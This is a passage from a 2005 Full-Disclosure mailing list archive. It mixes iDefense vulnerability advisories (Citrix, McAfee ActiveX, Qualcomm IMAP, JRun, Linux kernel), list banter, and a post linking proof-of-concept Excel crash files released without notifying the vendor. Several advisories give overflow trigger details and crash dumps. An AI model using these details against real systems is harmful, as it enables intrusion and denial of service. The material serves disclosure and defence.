Server 1.1. It is suspected that earlier versions and versions for other
platforms are vulnerable as well.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to vulnerable systems on TCP port 5005.

VI. VENDOR RESPONSE

The vendor has released the following security advisory for this issue:

http://kb.trendmicro.com/solutions/search/main/search/
solutionDetail.asp?solutionID=25254

"Contact Trend Micro Technical Support to request for the
SPNT5.58_HotfixB1137.zip file, which should only be installed on servers
running SPNT 5.58."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-1928 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/03/2005 Initial vendor notification
06/05/2005 Initial vendor response
12/14/2005 Public disclosure

IX. CREDIT

This vulnerability was discovered by Pedram Amini, OpenRCE
(www.openrce.org).

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have nothing against you n3td3v , maybe are you talking too many to
finally say nothing...
but when ppl see this

http://forum.crime-research.org/teech-me-how-to-hack-vt6.html?highlight=

etc, you should change your nick , email or you will keep receiving such
blames here I guess...

my 2cent suggestion 2 you dude

ghost wrote:
> "MW, days2t, jasonv = three security professionals " was funnier than
> the actual log.
> 
> 
> On 12/14/05, Xyberpix <[EMAIL PROTECTED]> wrote:
>> http://www.threatlab.com/r-u-fed.html
>>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ6CYo6+LRXunxpxfAQJYKxAA075Q+4pVuBdVv1gHEG/VtZPrDsbVl7K8
Uk8lLNyd/Sku1ePtRTMU8A7yPcSslL8rhqF4gv07FfsKaDXyf/i9i8MmoriRGm4b
YgS2S8dY4h0cc5FR2hacTmApHsPKRTVjz5GF7DSie98L1N5EJ9qf0jv8GQiKwHRv
XhGbFyhlAj8zYwOqmCF860jDSIKzaSaqtTvQp5g2E8gyZfyNYoR2r1IKybBfykFQ
sfkrSK0wTTi+y6xQxY4e+aOLkbS6I8/GK/S8+lFc4uT0ysQ9WGp7cnjReFHnA4vp
9/bVh/u9LcBwuHYZsES6xzvOGdtgllwoV3wMnBwafp7p6jdY4kWQ4jN9VaC5T8Bp
jOddMx4QY491DnPlzziIkr3rOm+/FoiUuInAl6bLcjN/DbfouD8u1wDw2lclWIso
yL863hgimZ0t1a9s0AZAhdDUMRUN/88HgTsZvvvE0kEETCQYP2bMuZaEtaCrjEzZ
UE88Abzp4K229+6UFTVEeDJ51gZ2xiUvELol45jelssZhyrmECc7HrIeIxtWTyPa
VjpaEoveO4vHn9WDHt3uMLlbEOM/MYXiard4HLboE/vjKMevBKMEd93WZ1nnGEtL
CNjg3BCY//xFVCpmmsQ/encArTOD+STSBxMuu1Tx6P/bIxvw7xe2uuMVzEX8NMG2
D9yOUIaBJ+c=
=pWol
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iDefense Security Advisory 12.14.05: Trend Micro ServerProtect relay.dll Chunked Overflow Vulnerability


Matt,

We don't disagree with you. The vulnerability lies in the Microsoft 
Foundation Classes (MFC) static libraries. Trend Micro also acknowledges 
this in their response. Unfortunately, Trend Micro's product 
distributions are vulnerable since they ship with the old static libraries.


Michael Sutton
Director, iDefense Labs

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

got it ;) later dude gone to bed..

n3td3v wrote:
> Hello,
> I sent you an offlist e-mail explaining the real reason behind that
> forum post, I hope you got it.
> Thanks,
> n3td3v
> 
> On 12/14/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> I have nothing against you n3td3v , maybe are you talking too many to
>> finally say nothing...
>> but when ppl see this
>>
>> http://forum.crime-research.org/teech-me-how-to-hack-vt6.html?highlight=
>>
>> etc, you should change your nick , email or you will keep receiving such
>> blames here I guess...
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ6Crvq+LRXunxpxfAQK6pRAAm6D1MHU7exXkMU4TKIQ2DcyZ9H9knrTQ
ssPpj/iXPwldRlldajhumDCyqYXTMbMjToVUV38IvURcnASYuQpWHdyeH3VPUAAi
QonOUWKPg+GaGQe2KNylevTd6d6m82LYpABNwcIaxbuRoaIcEbb5/xPi2cDuZkdk
BMWnFV2LK4Uy0ulNecF868Vw/7+K7qzSzbmp0eTl4XB1NEZ/K64q3je+2ELmXoDy
hiBGsWSil3p0S2sjuTBsONpbaIlrtXgzndlWiF4hphZFCUFyF5XkJN7NAJ3OW/LQ
hUq/DBHuCwpy0io2LjZnCIKTijtyMJPXXsXGDF0AAAiUzoRKE4vwNcfTXWYtGJr8
uf39KHQ2vtzIa9UiTFh+JWXwj6/duwymuYelf2akaehd3fw6u82lY07N7YD0dk5x
TeookZiaqH8orF26TtDP01fdZU0ZeyE0ky3hAWN3uB6vyzvOqwhBnQvGGN0clviF
pWNA5oxwfFE1j5Y31rSyeAZvKTRrlJhQgEvfCByKXebg8e7Sa4BAXK2NmhsCZyn2
G+2EOMz+dfoj1YSSGXB3Wait2QySGQckL1jWRyFtXDkufstn28mF5NYnsGtfYVI3
osj7wZvbhfxyEE2alO9A6muTurd8QeHf9cS0xONnyrlkkMbLX2fejGjfXyDmq6lG
P0RsG2wSjhk=
=Oyoo
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Moderated lists (NO)

2005-12-16 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

FD can't be fully moderated because this will become bugtraq xss and sql
injection land hehe, with vulnerabilities posted with a big delay
between sending and publishing, sometimes it can take up than 3-4 days
to publish a vulnerability on bugtraq already pubbed on FD , so no way
to kill FD as bq is.

Aditya Deshmukh wrote:
>  
>> Why not do a self-regulating list?  Something along the lines 
>> of keeping
>> track of signup dates and IP addresses, then when a yahoo starts
>> spouting crap, put it to a vote on list. (only members older then xyz
>> date have a vote) If the list's wish is to have the user 
>> banned, then so
>> be it... 
>>
> 
> This is all so good in principle but how do you implement it ? And how
> Does voting take place ? By email to the list ? This way anytime we have 
> To remove someone from the list it will generate a whole lot of useless 
> mail
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ6KhUq+LRXunxpxfAQLigRAApzzTbONSaRzIJFhsFgBQEpb1xVddtFDo
8nIvK/mfIwxNOu2ZaJYFt8PgTE2ov4+WmDImN+2vW+58bm8w3dPj/bC9Bhduit5d
JVz13P0cJ9O4Od7+YQoMVYvBKuDVG4Q4lCqHFhobCYBPZwO95C6XxiF0FQK7mtHA
1ihmO+fgVTTCHLt668SjVPBv9pLJtX1FHZgdP41Lrv1xv2swXKp5juc1OG5xl91i
nQVoAVVWdo09QpuQSNhMZ1IL0DiD0UXCyekme2PElTIIu8UAdJwn4OCEBmqt540q
QYvOOSHbVOjRG8BoPB6J+km/WdHJtUdKMUXWDDWM4yUWsOTCvXjWs2I9hFCXYsnU
RQ7pIY4SncGS2+j95mkxVD1vHB1FEHiJElqwbAtYP43GyUVbHzkvYTfsNbUMHbey
r/IHgi4LSgnd3CrosF75FaNgv71qzXav5fHug6jaIVblp5jJNZk9xhUzu8IYwOmq
ZTQOuXKy1kP8DKGf3vqgGSajGXDHa3IMrDKyW5Bdk/zHLJaCLBUtFxxVlA0RzRpu
ibcW7zCHPvs9zeWima58QD+VWJOe6opmH3QlP7cv+F8rYkHBJXmY1rYi7mPdOb2w
Ko71Se3Gu3mCR6DEM/MkpEQ4WgKpnRvzBTjUAZUNazOqRyvLPQCGbq2WUirr326U
hkYkcXPGXyY=
=VA4e
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.16.05: Citrix Program Neighborhood Name Heap Corruption Vulnerability

2005-12-16 Thread [EMAIL PROTECTED]


Citrix Program Neighborhood Name Heap Corruption Vulnerability

iDefense Security Advisory 12.16.05
www.idefense.com/application/poi/display?id=357&type=vulnerabilities
December 16, 2005

I. BACKGROUND

Citrix Program Neighborhood is the client used to connect to
applications published on Citrix Metaframe servers.

More information is available from the vendor website:

  http://www.citrix.com

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Citrix, Inc.'s
Program Neighborhood allows attackers to execute arbitrary code.

The vulnerability specifically exists due to insufficient handling of
corrupt Application Set responses. A heap-based buffer overflow will
occur when the Citrix Program Neighborhood client receives an
Application Set response containing a name value over 286 bytes. The
overflow will trigger an access violation in RtlFreeHeap() with
register control sufficient to write 4 bytes to an arbitrary location
as shown below:

77F52A7B  8B4E 0C MOV ECX,DWORD PTR DS:[ESI+C]
77F52A7E  898D 60FF  MOV DWORD PTR SS:[EBP-A0],ECX
77F52A84  8901   MOV DWORD PTR DS:[ECX],EAX

Registers:
EAX 41414141
ECX 4141
ESI 008D5E30 ASCII "AA"
EIP 77F52A84 ntdll.77F52A84

Crash:
77F52A84  8901   MOV DWORD PTR DS:[ECX],EAX

Remote attackers can send an specially crafted name value to overflow
the buffer and execute arbitrary code.

III. ANALYSIS

Successful exploitation of the vulnerability allows remote attackers to
execute arbitrary code with user privileges. The overflow is a
trivial heap-based buffer overflow due to insufficient bounds checking
on the 'name' value in Application Set responses. A typical
exploitation scenario would require an attacker to setup a fake Citrix
Server and wait for a Citrix Program Neighborhood client to connect.
Upon receiving the first connecting packets from the client, the server
would send a corrupt UDP packet to the client.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Citrix
Presentation Server Client 9.0. All prior versions are suspected
vulnerable.

V. WORKAROUND

iDefense is unaware of any effective workarounds at this time.

VI. VENDOR RESPONSE

The vendor has released the following advisory to address this issue:

http://support.citrix.com/kb/entry.jspa?externalID=CTX108354

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3652 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/15/2005 Initial vendor response
12/16/2005 Coordinated public disclosure

IX. CREDIT

iDefense credits Patrik Karlsson ([EMAIL PROTECTED]) with the discovery
of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] 2x 0day Microsoft Windows Excel

2005-12-19 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Let's go on the fast publishing :)
I wont bother to message microsoft about this because they wont patch it
for sure according that they can't patch fully exploitable bugs in a
decent time, they do not patch IE dos
(http://heapoverflow.com/IEcrash.htm), so no way to bother them, we
should let them sleep a bit shhh ;)

Bugs 1 and Bugs 2 are quite similiar but NOT, both are null pointer bugs
. In bug1 you should mod a grafic's pointer to point to a bad area, and
in bug 2 you should null out the size of the page name.


attached are the 2 pocs, nor here are direct links


http://heapoverflow.com/excelol/bug1.xls
http://heapoverflow.com/excelol/bug2.xls



Credits:

AD [at] heapoverflow.com



- ---

class101
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ6aRBK+LRXunxpxfAQKSHxAAucyw3lKI7mfbc4y5wjRNDXP5UnE7WSuJ
Z0j5xR/O666IkJ6s9ymoOwIO8flK9IvBoPKO6G5CxK0QWJSqHahfj1JDnEQSslGr
HYe+IOhr0JZ94AnqiCzF1gRevFDtDD8dYhEk41TvEIs67x43gAoHW6m/eMTxgOfn
HaF+7X7O5ovYK4nAe8wy2dsk2vzbvx0WTnERX+a1c3/OBXp/z6KuEevL8HFGdkZu
lk57U8jSzoEAGGtwiPlv7IN67Oz58uOHvQmjYuZhaVzpGU8v55qszHeR/VGy4KZC
BKyFZlXUVZc1zj+OEdRIznoGvC62QAmHIxF863U1KDlZaUGtqOOQv15yugDmODOY
gwzNdBkKnMbrM9B2yskbQB3e9kI3kwwG0lOKydhuOViF4AScBb5ckrKHybjKnv8c
0Q7kqx/CeEVf0UcMaf69A5X5FeH8xC4zAKjiM5VXTgyPtKuO7t6Z9NkdO01AWjSz
QunfGmmOEu3x2BN/x3dZL9D4vt3Im+f592vrwkiAGwws5gMsq15recZy4LIEMz1Y
4Gaf5kxpYs4OSkVNZjLoFj9LPeH1sGL5pOp6mQMq8P+YzS3RovDPrBLI/Kt89C2/
ycOaPXmWP5dD/ZPRC+r2lmqWzdd9d9MXE/8XrNqHHHuods7SgMqbLwCQX0VTf3Fx
WCSSdl+ab+Q=
=8nFj
-END PGP SIGNATURE-


bug2.xls
Description: MS-Excel spreadsheet


bug1.xls
Description: MS-Excel spreadsheet
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2005-12-19 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have said so this is only null pointer bugs but the way I trigger the
bug might be modded for a remote code execution who know , I'm not a
guru and maybe did an error triggering the flaw who knows :) but I bet
many are already reasearching on this hehe, happy job!

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ6ay46+LRXunxpxfAQK1yQ/+MIUjJNDwHdVETg/cQJR1/scU2RJ52juL
LCviLgWBjjibL8+maxcrRzzGV9oKDi+xuSxsjm5fYq11DiQsZCiUGp4odM5wJRoP
DEoWDG6+m1tGYbJ0B0QS2Dg/lCuNSpOnDjKV4s7NuuwYpevf19Fva1bfgO2+Ba5C
lkKgt2aR70VwWmQ9nkuZPadW57z/V4q/kqZyZi025KbD8/nwOBzapSd6VDCnBozw
LfzR7Ap0hHEOVRBdlvTnSKLs+AtIuLBTWf7vsOerNncoNCjf1QAeqi4/s2IsXERM
A8CvD6EqVNi2qKfO4w4vlN+gNlK4S5+Q2GGyBd+JKuTJBA1ATs+hchmRGwvHLQyn
QJjqnofxWSql7Zo3U3iZRrQkEM2pE2Z9+bqxqRdqBomzaraQj2tPwXgAeyQdHJNR
osBmvrSMxZTXIDh1PLdQfSeqyqsTtIZFslNhLzLpPgqiBroaXR1eizhH7nu2GbVU
+5KBgVqGz9rze03YDMbmT+vmtKwtTsJQrdFARzOuXHn9Q+iC7nK8jHHtuWp+ySsT
gTKVgvirmhORzLHk5Tsc5DCLbeYwd03kqp304LSSrw9U/BlcmtHoLTfTENombUXy
vPxA7tbJUSlLQpjaaKCCkBk+kNczAqcdj5NL10MQjcOBtp5Kt55/Zd+845WSwhIn
p0ov4pmCaME=
=c16L
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite

2005-12-20 Thread [EMAIL PROTECTED]


McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite

iDefense Security Advisory 12.20.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=358
December 20, 2005

I. BACKGROUND

McAfee VirusScan is an anti-virus software. More information is
available from the vendor website:

http://www.mcafee.com/myapps/

II. DESCRIPTION

Remote exploitation of an access control vulnerability in McAfee
Security Center allows attackers to create or overwrite arbitrary
files.

The vulnerability specifically exists due to a registered ActiveX
control failing to restrict which domains may load the control for
execution. MCINSCTL.DLL as included with McAfee Security Center exports
an object for logging called MCINSTALL.McLog. The McLog object is
designed to allow Security Center to log to a file through the StartLog
and AddLog methods. McAfee fails to restrict the ActiveX control from
being loaded in arbitrary domains. As such, attackers can create a
specially crafted web page utilizing the McLog object to create
arbitrary files. This attack can lead to arbitrary code execution by a
remote attacker.

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
create or append to arbitrary files. An attacker can write to a startup
folder to execute arbitrary code during the next reboot or logon
session. A user will not be required to authorize the object
instantiation since the object is within a signed ActiveX control. A
typical exploitation scenario would require an attacker to convince a
targeted user to visit a malicious website.

This vulnerability hints at a new class of vulnerabilities that occur
due to developers not using the IObjectSafetySiteLock() API to restrict
domains that can load a particular ActiveX control. Vendors who
distributed third-party ActiveX controls should be sure to use the
IObjectSafetySiteLock() API in their applications.

IV. DETECTION

McAfee Security Center is a component that is distributed with various
McAfee products. The following products have been confirmed to contain
a vulnerable mcinsctl.dll component in their distribution:

• McAfee VirusScan (mcinsctl.dll 4.0.0.83)

V. WORKAROUND

iDefense is unaware of any effective workarounds at this time.

VI. VENDOR RESPONSE

"McAfee previously released updates to SecurityCenter that resolve this
issue. All active McAfee SecurityCenter users, by default, should have
automatically received the update, and will now have the fix for this
vulnerability already installed on their computers.

To manually check for updates, users can right-click the McAfee system
tray icon (white M on red background) and select 'Updates'. In the
resulting dialogue box, they should click 'Check Now' to check the
server for updates. The user will be walked through the update process
or be notified that all software is up to date. If a user has not yet
registered, a registration web page or the registration wizard will
pop-up, guiding the user through the update process.

McAfee's key priority is the security of our customers. In the event
that a vulnerability is found within any of McAfee's software, we have a
strong process in place to work closely with the relevant security
research group to ensure the rapid and effective development of a fix
and communication plan."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3657 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/16/2005 Initial vendor response
12/20/2005 Coordinated public disclosure

IX. CREDIT

iDefense credits Peter Vreugdenhil with the discovery of this
vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.20.05: Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability

2005-12-20 Thread [EMAIL PROTECTED]

Qualcomm WorldMail IMAP Server String Literal Processing Overflow 
Vulnerability


iDefense Security Advisory 12.20.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359
December 20, 2005

I. BACKGROUND

Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.

More information can be found on the vendors site:

 http://www.eudora.com/worldmail/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Qualcomm
WorldMail IMAP Server allows unauthenticated attackers to execute
arbitrary code.

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
execute arbitrary code with SYSTEM privileges. This leads to a total
compromise of the mail server.

In order to trigger this overflow, an attacker only needs to send a long
string ending with a '}' character. This will result in a stack overflow
and the attacker may use an SEH overwrite or a standard EBP or EIP
overwrite in order to gain control of the process trivially.

This is a pre-authentication vulnerability. To exploit this
vulnerability an attacker would need to be able connect to the e-mail
server and the IMAP module would have to be enabled (default). Only one
command is required to trigger this vulnerability.

IV. DETECTION

This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.

V. WORKAROUND

There is no workaround currently available except for disabling IMAP
services.

VI. VENDOR RESPONSE

The vendor was contacted according to the timeline shown but a response
has not yet been received. As this vulnerability has been publicly
disclosed at an alternate location
(http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html) we are
proceeding with public disclosure.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4267 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/15/2005  Initial vendor notification
12/20/2005  Coordinated public disclosure

IX. CREDIT

[EMAIL PROTECTED], an anonymous researcher and Nico are credited with
the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.21.05: Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability

2005-12-21 Thread [EMAIL PROTECTED]


Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability

iDefense Security Advisory 12.21.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=360
December 21, 2005

I. BACKGROUND

Macromedia JRun 4 is an application server used for developing and
deploying Java based applications. More information can be found at
the following URL:

 http://www.macromedia.com/software/jrun/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Adobe Inc.'s
JRun 4 may allow attackers to execute arbitrary code or cause a denial
of service condition.

The vulnerability exists within the JRun web server, specifically in the
handling of long request strings. In certain configurations, when a long
(approximately 64k) URL is supplied, a stack-based overflow occurs
potentially allowing the execution of arbitrary code. In testing
performed by iDefense Labs, it was possible to overwrite the saved
return address on the stack with remotely supplied values (converted
into 'wide characters' by the server).

III. ANALYSIS

Successful exploitation may allow remote attackers to execute arbitrary
code with Local System privileges. The supplied JRun web server must be
active for the attack vector to exist. It is not recommended to use the
JRun web server component in production systems, as the installer
mentions that it should be used for development only.

As the service restarts after each crash, it is possible to make
multiple attempts to exploit this issue, and each time restart from a
'clean' state.

Although this vulnerability allows a stack overwrite, it may be more
difficult to exploit due the input string being converted into a 'wide
character' version of the str input, by placing a null byte between
each character. While this does not necessarily prevent exploitation, it
does increase the complexity of developing an exploit.

Exploitation of this vulnerability may allow a remote attacker to
execute code on the affected system as Local System, allowing complete
compromise, or cause a denial of service against the affected system,
preventing legitimate use.

IV. DETECTION

This vulnerability was confirmed by the vendor to affect the JRun 4
webserver server prior to the JRun 4 Updater 5 release in March of 2005.

V. WORKAROUND

The JRun documentation suggests that the JRun Web Server should not be
used in a production environment. In a development environment, the
JRun server should not accept connections from outside of the
development network.

VI. VENDOR RESPONSE

Adobe has reported that this issue was resolved in the JRun 4 Updater 5
release in March 2005.

The following security advisory was released on December 15, 2005:

http://www.macromedia.com/devnet/security/security_zone/mpsb05-13.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

08/25/2004 Initial vendor notification
08/31/2004 Initial vendor response
12/21/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability

2005-12-22 Thread [EMAIL PROTECTED]


Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability

iDefense Security Advisory 12.22.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=362
December 22, 2005

I. BACKGROUND

Linux is a clone of the operating system Unix, written from scratch by
Linus Torvalds with assistance from a loosely-knit team of hackers
across the Net. It aims towards POSIX and Single UNIX Specification
compliance.

More information is available from the vendor website:

 http://www.kernel.org

II. DESCRIPTION

Local exploitation of a memory exhaustion vulnerability in Linux Kernel
versions 2.4 and 2.6 can allow attackers to cause a denial of service
condition.

The vulnerability specifically exists due to a lack of resource checking
during the buffering of data for transfer over a pair of sockets. An
attacker can create a situation that, depending on the amount of
available system resources, can cause the kernel to panic due to memory
resource exhaustion. The attack is conducted by opening up a number of
connected file descriptors or socketpairs and creating the largest
possible kernel buffer for the data transfer between the two sockets. By
causing the process to enter a zombie state or closing the file
descriptor while keeping a reference open, the data is kept in the
kernel until the transfer can complete. If done repeatedly, system
memory resources can be exhausted from the kernel.

III. ANALYSIS

Successful exploitation requires an attacker to have local access to an
affected Linux system and can result in complete system denial of
service. The system may not reboot after successful exploitation,
requiring human interaction to be restored to a working state. Depending
on available resources, systems with large amounts of physical memory
may not be affected.

IV. DETECTION


iDefense has confirmed that Linux 2.4.22 and Linux 2.6.12 are
vulnerable.

V. WORKAROUND

An effective workaround is not available for this vulnerability.

VI. VENDOR RESPONSE

The maintainer acknowledges that this issue is a design limitation in
the Linux kernel. The following advice has been offered for creating a
patch. It should be noted that this patch has not been fully tested.

The patch requires three steps:

1) Add a "struct user *" reference to the "struct file" file structure.

2) Whenever creating a new "struct file" add the following code:

   struct user *user = current->user;
   
   if (atomic_read(&user->files) > MAX_FILES_FOR_THIS_USER)

   return -EMFILE;
   
   file->user = user;

   if(user) {
   atomic_inc(&user->count);
   atomic_inc(&user->files);
   }

3) Whenever a "struct file" is released apply the following code:

   struct user *user = file->user;
   
   if (user) {

   atomic_dec(&user->files);
   free_uid(user);
   }

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3660 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification - Linux vendors
11/19/2005 Initial vendor responses
12/22/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
